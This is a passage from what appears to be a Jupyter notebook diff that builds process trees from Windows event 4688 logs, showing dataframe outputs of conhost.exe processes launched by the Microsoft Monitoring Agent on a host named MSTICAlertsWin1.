                                       TimeGenerated_orig_par  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \n\n                                                        path parent_index  \nproc_key                                                                   \nc:\\program files\\microsoft monitoring agent\\age...   1004/10         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/107         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/120         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/127         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/129         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/139         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/15         1004  \nc:\\program files\\microsoft monitoring agent\\age...    1004/5         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/67         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/76         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/78         1004  \nc:\\program files\\microsoft monitoring agent\\age...    1004/8         1004  \n\n[12 rows x 35 columns]"
+       },
+       "execution_count": 13,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "depth = full_tree[\"path\"].str.count(\"/\").max()\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]"
+    },
+    "executionTime": "2019-12-13T20:43:57.423Z"
+   },
+   {
+    "cell": {
+     "executionCount": 14,
+     "executionEventId": "8679b1d9-3417-49db-8138-1b4374ca3939",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x183c</td>\n      <td>...</td>\n      <td>998.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/10/11</td>\n      <td>10</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.267000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.267</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x21c8</td>\n      <td>...</td>\n      <td>749.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 23:22:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/107/108</td>\n      <td>107</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.280000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.280</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1c24</td>\n      <td>...</td>\n      <td>883.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 23:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/120/121</td>\n      <td>120</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x17a4</td>\n      <td>...</td>\n      <td>549.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/127/128</td>\n      <td>127</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1c10</td>\n      <td>...</td>\n      <td>478.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:12:56.252999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/129/130</td>\n      <td>129</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.287000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.287</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x235c</td>\n      <td>...</td>\n      <td>553.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:32:56.270000128</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/139/140</td>\n      <td>139</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.290000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.290</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1468</td>\n      <td>...</td>\n      <td>848.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:32:56.270000128</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/15/16</td>\n      <td>15</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.280000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.280</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1278</td>\n      <td>...</td>\n      <td>850.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 20:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/5/6</td>\n      <td>5</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.277000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.277</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbc</td>\n      <td>...</td>\n      <td>984.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:02:56.263000064</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/67/68</td>\n      <td>67</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1834</td>\n      <td>...</td>\n      <td>738.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:32:56.247000064</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/76/77</td>\n      <td>76</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15f4</td>\n      <td>...</td>\n      <td>736.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/78/79</td>\n      <td>78</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xfd4</td>\n      <td>...</td>\n      <td>887.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 20:52:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/8/9</td>\n      <td>8</td>\n    </tr>\n  </tbody>\n</table>\n<p>12 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...     4688   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...     4688   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...     4688   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...     4688   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...     4688   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.267   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.280   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.270   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.263   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.287   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.290   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.280   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.277   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.260   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.273   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...          0x3e7   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       0x183c  ...   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...       0x21c8  ...   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...       0x1c24  ...   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...       0x17a4  ...   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...       0x1c10  ...   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...       0x235c  ...   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...       0x1468  ...   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...       0x1278  ...   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         0xbc  ...   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...       0x1834  ...   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...       0x15f4  ...   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...        0xfd4  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...            998.0   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...            749.0   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...            883.0   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...            549.0   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...            478.0   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...            553.0   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...            848.0   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...            850.0   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...            984.0   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...            738.0   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...            736.0   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...            887.0   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...         0x864   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...         0x864   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...         0x864   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         0x864   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...         0x864   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...         0x864   \n\n                                                                                   NewProcessName_par  \\\nproc_key                                                                                                \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   